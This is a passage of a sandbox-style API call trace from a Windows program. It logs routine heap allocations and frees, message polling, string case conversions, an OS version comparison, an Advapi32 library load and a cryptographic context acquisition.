dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0166.164] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0166.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0166.164] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0166.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0166.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0166.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0166.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0166.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0166.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0166.165] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0166.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0166.165] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0166.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0166.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0166.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0166.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0166.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0166.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0166.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0166.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0166.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0166.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0166.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0166.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0166.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0166.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0166.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0166.166] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0166.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0166.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0166.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0166.166] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0166.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0166.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0166.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0166.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0166.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0166.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0166.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0166.167] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0166.167] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.167] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0166.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0166.167] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.167] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0166.167] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.167] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.167] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.167] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.167] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.167] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.167] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0166.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0166.167] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.168] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0166.168] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0166.168] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0166.168] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0166.168] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0166.168] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0166.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0166.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0166.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0166.168] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xab2890) returned 1 [0166.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0166.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0166.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0166.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0166.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0166.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0166.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0166.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0166.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0166.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0166.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0166.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0166.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0166.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0166.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0166.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0166.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0166.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0166.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0166.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0166.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0166.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0166.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0166.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0166.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0166.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0166.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0166.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0166.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0166.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0166.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0166.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0166.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0166.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0166.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0166.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0166.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0166.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0166.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0166.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0166.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0166.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0166.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0166.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0166.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0166.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0166.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0166.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0166.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0166.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0166.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0166.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0166.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0166.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0166.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0166.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0166.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0166.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0166.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0166.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0166.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0166.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0166.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0166.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0166.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0166.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0166.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0166.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0166.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0166.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0166.173] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0166.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0166.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0166.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0166.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0166.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0166.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0166.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0166.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0166.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0166.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0166.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0166.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0166.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0166.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0166.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0166.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0166.173] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0166.174] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0166.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0166.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0166.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0166.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0166.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0166.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0166.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0166.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0166.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0166.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0166.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0166.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0166.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0166.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0166.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0166.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0166.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0166.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0166.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0166.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0166.175] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0166.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0166.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0166.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0166.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0166.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0166.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0166.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0166.175] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0166.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0166.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0166.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0166.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0166.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0166.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0166.176] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 